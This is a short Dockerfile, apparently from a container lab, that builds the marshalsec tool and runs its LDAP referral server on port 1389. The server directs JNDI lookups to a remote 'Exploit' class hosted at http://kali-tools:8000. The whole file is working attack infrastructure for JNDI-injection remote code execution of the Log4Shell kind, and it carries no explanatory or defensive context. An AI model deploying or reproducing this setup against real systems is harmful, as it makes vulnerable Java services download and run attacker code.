FROM maven:3.8.6-openjdk-8

WORKDIR /app

RUN apt-get update && apt-get install -y git && \
    git clone https://github.com/mbechler/marshalsec.git . && \
    mvn clean package -DskipTests

EXPOSE 1389

# CORRECCIÓN: Apuntar al directorio raíz / y definir la clase con #Exploit
CMD ["java", "-cp", "target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", "http://kali-tools:8000/#Exploit", "1389"]
